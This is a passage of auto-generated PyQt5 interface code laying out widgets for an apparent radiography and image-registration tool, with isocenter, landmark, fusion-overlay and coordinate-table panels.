sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Logo.sizePolicy().hasHeightForWidth())
self.Logo.setSizePolicy(sizePolicy)
self.Logo.setMaximumSize(QtCore.QSize(16777215, 300))
self.Logo.setText("")
self.Logo.setPixmap(QtGui.QPixmap(":/Imgs/Icons/Pic.jpg"))
self.Logo.setScaledContents(True)
self.Logo.setObjectName("Logo")
self.groupBox = QtWidgets.QGroupBox(self.splitter_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox.sizePolicy().hasHeightForWidth())
self.groupBox.setSizePolicy(sizePolicy)
self.groupBox.setMinimumSize(QtCore.QSize(200, 300))
self.groupBox.setObjectName("groupBox")
self.gridLayout_14 = QtWidgets.QGridLayout(self.groupBox)
self.gridLayout_14.setObjectName("gridLayout_14")
self.LogBox = QtWidgets.QVBoxLayout()
self.LogBox.setObjectName("LogBox")
self.gridLayout_14.addLayout(self.LogBox, 0, 0, 1, 1)
self.gridLayout_50.addWidget(self.splitter_4, 0, 1, 2, 1)
self.GroupCoordinates = QtWidgets.QGroupBox(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.GroupCoordinates.sizePolicy().hasHeightForWidth())
self.GroupCoordinates.setSizePolicy(sizePolicy)
self.GroupCoordinates.setMinimumSize(QtCore.QSize(0, 100))
self.GroupCoordinates.setMaximumSize(QtCore.QSize(16777215, 200))
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.GroupCoordinates.setFont(font)
self.GroupCoordinates.setObjectName("GroupCoordinates")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.GroupCoordinates)
self.horizontalLayout.setObjectName("horizontalLayout")
self.SS_IsoCenter = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_IsoCenter.setMinimumSize(QtCore.QSize(0, 20))
self.SS_IsoCenter.setAutoFillBackground(False)
self.SS_IsoCenter.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_IsoCenter.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_IsoCenter.setObjectName("SS_IsoCenter")
self.gridLayout_43 = QtWidgets.QGridLayout(self.SS_IsoCenter)
self.gridLayout_43.setObjectName("gridLayout_43")
self.SS_IC_Label = QtWidgets.QLabel(self.SS_IsoCenter)
self.SS_IC_Label.setAlignment(QtCore.Qt.AlignCenter)
self.SS_IC_Label.setObjectName("SS_IC_Label")
self.gridLayout_43.addWidget(self.SS_IC_Label, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_IsoCenter)
self.label_7 = QtWidgets.QLabel(self.GroupCoordinates)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7.sizePolicy().hasHeightForWidth())
self.label_7.setSizePolicy(sizePolicy)
self.label_7.setText("")
self.label_7.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_7.setScaledContents(True)
self.label_7.setObjectName("label_7")
self.horizontalLayout.addWidget(self.label_7)
self.SS_PlanImage = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_PlanImage.setMinimumSize(QtCore.QSize(0, 20))
self.SS_PlanImage.setAutoFillBackground(False)
self.SS_PlanImage.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_PlanImage.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_PlanImage.setObjectName("SS_PlanImage")
self.gridLayout_44 = QtWidgets.QGridLayout(self.SS_PlanImage)
self.gridLayout_44.setObjectName("gridLayout_44")
self.SS_Plan_Box_2 = QtWidgets.QLabel(self.SS_PlanImage)
self.SS_Plan_Box_2.setAlignment(QtCore.Qt.AlignCenter)
self.SS_Plan_Box_2.setObjectName("SS_Plan_Box_2")
self.gridLayout_44.addWidget(self.SS_Plan_Box_2, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_PlanImage)
self.label_8 = QtWidgets.QLabel(self.GroupCoordinates)
self.label_8.setText("")
self.label_8.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_8.setScaledContents(True)
self.label_8.setObjectName("label_8")
self.horizontalLayout.addWidget(self.label_8)
self.SS_TreatImage = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_TreatImage.setMinimumSize(QtCore.QSize(0, 20))
self.SS_TreatImage.setAutoFillBackground(False)
self.SS_TreatImage.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_TreatImage.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_TreatImage.setObjectName("SS_TreatImage")
self.gridLayout_47 = QtWidgets.QGridLayout(self.SS_TreatImage)
self.gridLayout_47.setObjectName("gridLayout_47")
self.LabelCOM_4 = QtWidgets.QLabel(self.SS_TreatImage)
self.LabelCOM_4.setAlignment(QtCore.Qt.AlignCenter)
self.LabelCOM_4.setObjectName("LabelCOM_4")
self.gridLayout_47.addWidget(self.LabelCOM_4, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_TreatImage)
self.label_11 = QtWidgets.QLabel(self.GroupCoordinates)
self.label_11.setText("")
self.label_11.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_11.setScaledContents(True)
self.label_11.setObjectName("label_11")
self.horizontalLayout.addWidget(self.label_11)
self.SS_RegApproved = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_RegApproved.setMinimumSize(QtCore.QSize(0, 20))
self.SS_RegApproved.setAutoFillBackground(False)
self.SS_RegApproved.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_RegApproved.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_RegApproved.setObjectName("SS_RegApproved")
self.gridLayout_49 = QtWidgets.QGridLayout(self.SS_RegApproved)
self.gridLayout_49.setObjectName("gridLayout_49")
self.LabelCOM_5 = QtWidgets.QLabel(self.SS_RegApproved)
self.LabelCOM_5.setAlignment(QtCore.Qt.AlignCenter)
self.LabelCOM_5.setObjectName("LabelCOM_5")
self.gridLayout_49.addWidget(self.LabelCOM_5, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_RegApproved)
self.label_12 = QtWidgets.QLabel(self.GroupCoordinates)
self.label_12.setText("")
self.label_12.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_12.setScaledContents(True)
self.label_12.setObjectName("label_12")
self.horizontalLayout.addWidget(self.label_12)
self.SS_StageSet = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_StageSet.setMinimumSize(QtCore.QSize(0, 20))
self.SS_StageSet.setAutoFillBackground(False)
self.SS_StageSet.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_StageSet.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_StageSet.setObjectName("SS_StageSet")
self.gridLayout_52 = QtWidgets.QGridLayout(self.SS_StageSet)
self.gridLayout_52.setObjectName("gridLayout_52")
self.LabelCOM_6 = QtWidgets.QLabel(self.SS_StageSet)
self.LabelCOM_6.setAlignment(QtCore.Qt.AlignCenter)
self.LabelCOM_6.setObjectName("LabelCOM_6")
self.gridLayout_52.addWidget(self.LabelCOM_6, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_StageSet)
self.label_16 = QtWidgets.QLabel(self.GroupCoordinates)
self.label_16.setText("")
self.label_16.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_16.setScaledContents(True)
self.label_16.setObjectName("label_16")
self.horizontalLayout.addWidget(self.label_16)
self.Button_create_report = QtWidgets.QPushButton(self.GroupCoordinates)
self.Button_create_report.setMaximumSize(QtCore.QSize(16777215, 500))
self.Button_create_report.setObjectName("Button_create_report")
self.horizontalLayout.addWidget(self.Button_create_report)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.gridLayout_50.addWidget(self.GroupCoordinates, 1, 0, 1, 1)
self.Registration = QtWidgets.QTabWidget(self.centralwidget)
self.Registration.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Registration.sizePolicy().hasHeightForWidth())
self.Registration.setSizePolicy(sizePolicy)
self.Registration.setObjectName("Registration")
self.TabRadiography = QtWidgets.QWidget()
self.TabRadiography.setObjectName("TabRadiography")
self.gridLayout_15 = QtWidgets.QGridLayout(self.TabRadiography)
self.gridLayout_15.setObjectName("gridLayout_15")
self.Group_IsoCenter = QtWidgets.QGroupBox(self.TabRadiography)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Group_IsoCenter.sizePolicy().hasHeightForWidth())
self.Group_IsoCenter.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setBold(True)
font.setItalic(False)
font.setWeight(75)
self.Group_IsoCenter.setFont(font)
self.Group_IsoCenter.setObjectName("Group_IsoCenter")
self.gridLayout_5 = QtWidgets.QGridLayout(self.Group_IsoCenter)
self.gridLayout_5.setObjectName("gridLayout_5")
self.label_5 = QtWidgets.QLabel(self.Group_IsoCenter)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_5.setFont(font)
self.label_5.setObjectName("label_5")
self.gridLayout_5.addWidget(self.label_5, 2, 0, 1, 1)
self.Button_Radiograph_toggleIso = QtWidgets.QPushButton(self.Group_IsoCenter)
font = QtGui.QFont()
font.setPointSize(10)
self.Button_Radiograph_toggleIso.setFont(font)
self.Button_Radiograph_toggleIso.setObjectName("Button_Radiograph_toggleIso")
self.gridLayout_5.addWidget(self.Button_Radiograph_toggleIso, 0, 2, 1, 2)
self.Text_RG_Filename_IsoCenter = QtWidgets.QTextEdit(self.Group_IsoCenter)
self.Text_RG_Filename_IsoCenter.setMaximumSize(QtCore.QSize(16777215, 60))
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(False)
font.setWeight(50)
self.Text_RG_Filename_IsoCenter.setFont(font)
self.Text_RG_Filename_IsoCenter.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.Text_RG_Filename_IsoCenter.setObjectName("Text_RG_Filename_IsoCenter")
self.gridLayout_5.addWidget(self.Text_RG_Filename_IsoCenter, 1, 0, 1, 4)
self.label_6 = QtWidgets.QLabel(self.Group_IsoCenter)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_6.setFont(font)
self.label_6.setObjectName("label_6")
self.gridLayout_5.addWidget(self.label_6, 2, 2, 1, 1)
self.Button_RG_defineIsoCenter = QtWidgets.QPushButton(self.Group_IsoCenter)
font = QtGui.QFont()
font.setPointSize(10)
self.Button_RG_defineIsoCenter.setFont(font)
self.Button_RG_defineIsoCenter.setObjectName("Button_RG_defineIsoCenter")
self.gridLayout_5.addWidget(self.Button_RG_defineIsoCenter, 0, 0, 1, 2)
self.SpotTxt_x = QtWidgets.QLineEdit(self.Group_IsoCenter)
self.SpotTxt_x.setEnabled(False)
font = QtGui.QFont()
font.setPointSize(10)
self.SpotTxt_x.setFont(font)
self.SpotTxt_x.setReadOnly(True)
self.SpotTxt_x.setObjectName("SpotTxt_x")
self.gridLayout_5.addWidget(self.SpotTxt_x, 2, 1, 1, 1)
self.SpotTxt_y = QtWidgets.QLineEdit(self.Group_IsoCenter)
self.SpotTxt_y.setEnabled(False)
font = QtGui.QFont()
font.setPointSize(10)
self.SpotTxt_y.setFont(font)
self.SpotTxt_y.setReadOnly(True)
self.SpotTxt_y.setObjectName("SpotTxt_y")
self.gridLayout_5.addWidget(self.SpotTxt_y, 2, 3, 1, 1)
self.gridLayout_15.addWidget(self.Group_IsoCenter, 1, 0, 1, 1)
self.Display_Radiography = matplotlibWidget(self.TabRadiography)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Radiography.sizePolicy().hasHeightForWidth())
self.Display_Radiography.setSizePolicy(sizePolicy)
self.Display_Radiography.setMinimumSize(QtCore.QSize(200, 200))
self.Display_Radiography.setObjectName("Display_Radiography")
self.gridLayout_15.addWidget(self.Display_Radiography, 0, 1, 1, 1)
self.Display_Isocenter = matplotlibWidget(self.TabRadiography)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Isocenter.sizePolicy().hasHeightForWidth())
self.Display_Isocenter.setSizePolicy(sizePolicy)
self.Display_Isocenter.setMinimumSize(QtCore.QSize(200, 200))
self.Display_Isocenter.setObjectName("Display_Isocenter")
self.gridLayout_15.addWidget(self.Display_Isocenter, 0, 0, 1, 1)
self.groupBox_3 = QtWidgets.QGroupBox(self.TabRadiography)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_3.sizePolicy().hasHeightForWidth())
self.groupBox_3.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setBold(True)
font.setItalic(False)
font.setWeight(75)
self.groupBox_3.setFont(font)
self.groupBox_3.setObjectName("groupBox_3")
self.gridLayout_3 = QtWidgets.QGridLayout(self.groupBox_3)
self.gridLayout_3.setObjectName("gridLayout_3")
self.Button_RadiographyLM = QtWidgets.QPushButton(self.groupBox_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Button_RadiographyLM.sizePolicy().hasHeightForWidth())
self.Button_RadiographyLM.setSizePolicy(sizePolicy)
self.Button_RadiographyLM.setMinimumSize(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(9)
self.Button_RadiographyLM.setFont(font)
self.Button_RadiographyLM.setAutoFillBackground(False)
self.Button_RadiographyLM.setDefault(True)
self.Button_RadiographyLM.setObjectName("Button_RadiographyLM")
self.gridLayout_3.addWidget(self.Button_RadiographyLM, 0, 0, 1, 2)
self.Button_toggleLandmarksRG = QtWidgets.QPushButton(self.groupBox_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Button_toggleLandmarksRG.sizePolicy().hasHeightForWidth())
self.Button_toggleLandmarksRG.setSizePolicy(sizePolicy)
self.Button_toggleLandmarksRG.setMinimumSize(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(9)
self.Button_toggleLandmarksRG.setFont(font)
self.Button_toggleLandmarksRG.setAutoFillBackground(False)
self.Button_toggleLandmarksRG.setDefault(True)
self.Button_toggleLandmarksRG.setObjectName("Button_toggleLandmarksRG")
self.gridLayout_3.addWidget(self.Button_toggleLandmarksRG, 0, 3, 1, 1)
self.Text_RG_Filename_Landmark = QtWidgets.QTextEdit(self.groupBox_3)
self.Text_RG_Filename_Landmark.setMaximumSize(QtCore.QSize(16777215, 60))
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(False)
font.setWeight(50)
self.Text_RG_Filename_Landmark.setFont(font)
self.Text_RG_Filename_Landmark.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.Text_RG_Filename_Landmark.setObjectName("Text_RG_Filename_Landmark")
self.gridLayout_3.addWidget(self.Text_RG_Filename_Landmark, 1, 0, 1, 4)
self.label_24 = QtWidgets.QLabel(self.groupBox_3)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_24.setFont(font)
self.label_24.setObjectName("label_24")
self.gridLayout_3.addWidget(self.label_24, 2, 0, 1, 1)
self.TxtRGPinX = QtWidgets.QLineEdit(self.groupBox_3)
self.TxtRGPinX.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.TxtRGPinX.sizePolicy().hasHeightForWidth())
self.TxtRGPinX.setSizePolicy(sizePolicy)
self.TxtRGPinX.setMinimumSize(QtCore.QSize(50, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TxtRGPinX.setFont(font)
self.TxtRGPinX.setText("")
self.TxtRGPinX.setObjectName("TxtRGPinX")
self.gridLayout_3.addWidget(self.TxtRGPinX, 2, 1, 1, 1)
self.label_23 = QtWidgets.QLabel(self.groupBox_3)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_23.setFont(font)
self.label_23.setObjectName("label_23")
self.gridLayout_3.addWidget(self.label_23, 2, 2, 1, 1)
self.TxtRGPinY = QtWidgets.QLineEdit(self.groupBox_3)
self.TxtRGPinY.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.TxtRGPinY.sizePolicy().hasHeightForWidth())
self.TxtRGPinY.setSizePolicy(sizePolicy)
self.TxtRGPinY.setMinimumSize(QtCore.QSize(50, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TxtRGPinY.setFont(font)
self.TxtRGPinY.setText("")
self.TxtRGPinY.setObjectName("TxtRGPinY")
self.gridLayout_3.addWidget(self.TxtRGPinY, 2, 3, 1, 1)
self.gridLayout_15.addWidget(self.groupBox_3, 1, 1, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_15.addItem(spacerItem1, 0, 2, 1, 1)
self.Registration.addTab(self.TabRadiography, "")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.gridLayout_11 = QtWidgets.QGridLayout(self.tab)
self.gridLayout_11.setObjectName("gridLayout_11")
self.groupBox_20 = QtWidgets.QGroupBox(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_20.sizePolicy().hasHeightForWidth())
self.groupBox_20.setSizePolicy(sizePolicy)
self.groupBox_20.setObjectName("groupBox_20")
self.gridLayout_10 = QtWidgets.QGridLayout(self.groupBox_20)
self.gridLayout_10.setObjectName("gridLayout_10")
self.Button_RunReg = QtWidgets.QPushButton(self.groupBox_20)
self.Button_RunReg.setObjectName("Button_RunReg")
self.gridLayout_10.addWidget(self.Button_RunReg, 2, 0, 1, 1)
self.Slider_RegOverlay = QtWidgets.QSlider(self.groupBox_20)
self.Slider_RegOverlay.setMaximum(100)
self.Slider_RegOverlay.setSingleStep(0)
self.Slider_RegOverlay.setProperty("value", 50)
self.Slider_RegOverlay.setOrientation(QtCore.Qt.Horizontal)
self.Slider_RegOverlay.setObjectName("Slider_RegOverlay")
self.gridLayout_10.addWidget(self.Slider_RegOverlay, 1, 0, 1, 2)
self.Button_AccReg = QtWidgets.QPushButton(self.groupBox_20)
self.Button_AccReg.setObjectName("Button_AccReg")
self.gridLayout_10.addWidget(self.Button_AccReg, 2, 1, 1, 1)
self.Display_Fusion = matplotlibWidget(self.groupBox_20)
self.Display_Fusion.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Fusion.sizePolicy().hasHeightForWidth())
self.Display_Fusion.setSizePolicy(sizePolicy)
self.Display_Fusion.setMinimumSize(QtCore.QSize(300, 300))
self.Display_Fusion.setMaximumSize(QtCore.QSize(1000000, 1000000))
self.Display_Fusion.setObjectName("Display_Fusion")
self.gridLayout_10.addWidget(self.Display_Fusion, 0, 0, 1, 2)
self.gridLayout_11.addWidget(self.groupBox_20, 0, 2, 1, 1)
self.frame_4 = QtWidgets.QFrame(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.frame_4.sizePolicy().hasHeightForWidth())
self.frame_4.setSizePolicy(sizePolicy)
self.frame_4.setMinimumSize(QtCore.QSize(0, 200))
self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_4.setObjectName("frame_4")
self.gridLayout_4 = QtWidgets.QGridLayout(self.frame_4)
self.gridLayout_4.setObjectName("gridLayout_4")
self.groupBox_21 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_21.sizePolicy().hasHeightForWidth())
self.groupBox_21.setSizePolicy(sizePolicy)
self.groupBox_21.setMinimumSize(QtCore.QSize(250, 170))
self.groupBox_21.setObjectName("groupBox_21")
self.gridLayout = QtWidgets.QGridLayout(self.groupBox_21)
self.gridLayout.setObjectName("gridLayout")
self.Button_default_moving = QtWidgets.QPushButton(self.groupBox_21)
self.Button_default_moving.setObjectName("Button_default_moving")
self.gridLayout.addWidget(self.Button_default_moving, 1, 0, 2, 2)
self.CoordsTable = QtWidgets.QTableWidget(self.groupBox_21)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.CoordsTable.sizePolicy().hasHeightForWidth())
self.CoordsTable.setSizePolicy(sizePolicy)
self.CoordsTable.setMinimumSize(QtCore.QSize(0, 20))
self.CoordsTable.setMaximumSize(QtCore.QSize(500, 150))
font = QtGui.QFont()
font.setPointSize(7)
self.CoordsTable.setFont(font)
self.CoordsTable.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)
self.CoordsTable.setDragDropOverwriteMode(False)
self.CoordsTable.setObjectName("CoordsTable")
self.CoordsTable.setColumnCount(2)
self.CoordsTable.setRowCount(5)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(0, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(0, 1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(1, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(1, 1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(2, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(2, 1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(3, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(3, 1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(4, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(4, 1, item)
self.CoordsTable.horizontalHeader().setDefaultSectionSize(60)
self.CoordsTable.verticalHeader().setDefaultSectionSize(22)
self.gridLayout.addWidget(self.CoordsTable, 0, 0, 1, 2)
self.Button_default_fixed = QtWidgets.QPushButton(self.groupBox_21)
self.Button_default_fixed.setObjectName("Button_default_fixed")
self.gridLayout.addWidget(self.Button_default_fixed, 3, 0, 1, 2)
self.gridLayout_4.addWidget(self.groupBox_21, 0, 0, 3, 1)
self.groupBox_2 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
self.groupBox_2.setSizePolicy(sizePolicy)
self.groupBox_2.setMinimumSize(QtCore.QSize(0, 100))
self.groupBox_2.setObjectName("groupBox_2")
self.gridLayout_6 = QtWidgets.QGridLayout(self.groupBox_2)
self.gridLayout_6.setObjectName("gridLayout_6")
self.Slider_MarkerSize_Moving = QtWidgets.QSlider(self.groupBox_2)
self.Slider_MarkerSize_Moving.setOrientation(QtCore.Qt.Horizontal)
self.Slider_MarkerSize_Moving.setObjectName("Slider_MarkerSize_Moving")
self.gridLayout_6.addWidget(self.Slider_MarkerSize_Moving, 0, 1, 1, 1)
self.Slider_MarkerSize_Fixed = QtWidgets.QSlider(self.groupBox_2)
self.Slider_MarkerSize_Fixed.setOrientation(QtCore.Qt.Horizontal)
self.Slider_MarkerSize_Fixed.setObjectName("Slider_MarkerSize_Fixed")
self.gridLayout_6.addWidget(self.Slider_MarkerSize_Fixed, 1, 1, 1, 1)
self.label = QtWidgets.QLabel(self.groupBox_2)
self.label.setObjectName("label")
self.gridLayout_6.addWidget(self.label, 0, 0, 1, 1)
self.label_3 = QtWidgets.QLabel(self.groupBox_2)
self.label_3.setObjectName("label_3")
self.gridLayout_6.addWidget(self.label_3, 1, 0, 1, 1)
self.gridLayout_4.addWidget(self.groupBox_2, 0, 2, 1, 1)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.groupBox_10 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_10.sizePolicy().hasHeightForWidth())
self.groupBox_10.setSizePolicy(sizePolicy)
self.groupBox_10.setMinimumSize(QtCore.QSize(100, 0))
self.groupBox_10.setMaximumSize(QtCore.QSize(400, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.groupBox_10.setFont(font)
self.groupBox_10.setAutoFillBackground(False)
self.groupBox_10.setObjectName("groupBox_10")
self.gridLayout_2 = QtWidgets.QGridLayout(self.groupBox_10)
self.gridLayout_2.setObjectName("gridLayout_2")
self.TableTxt_y = QtWidgets.QLineEdit(self.groupBox_10)
self.TableTxt_y.setEnabled(False)
self.TableTxt_y.setMinimumSize(QtCore.QSize(40, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TableTxt_y.setFont(font)
self.TableTxt_y.setObjectName("TableTxt_y")
self.gridLayout_2.addWidget(self.TableTxt_y, 1, 1, 1, 1)
self.label_13 = QtWidgets.QLabel(self.groupBox_10)
font = QtGui.QFont()
font.setPointSize(10)
self.label_13.setFont(font)
self.label_13.setObjectName("label_13")
self.gridLayout_2.addWidget(self.label_13, 0, 0, 1, 1)
self.label_57 = QtWidgets.QLabel(self.groupBox_10)
font = QtGui.QFont()
font.setPointSize(10)
self.label_57.setFont(font)
self.label_57.setObjectName("label_57")
self.gridLayout_2.addWidget(self.label_57, 0, 2, 1, 1)
self.label_14 = QtWidgets.QLabel(self.groupBox_10)
font = QtGui.QFont()
font.setPointSize(10)
self.label_14.setFont(font)
self.label_14.setObjectName("label_14")
self.gridLayout_2.addWidget(self.label_14, 1, 0, 1, 1)
self.TableTxt_x = QtWidgets.QLineEdit(self.groupBox_10)
self.TableTxt_x.setEnabled(False)
self.TableTxt_x.setMinimumSize(QtCore.QSize(40, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TableTxt_x.setFont(font)
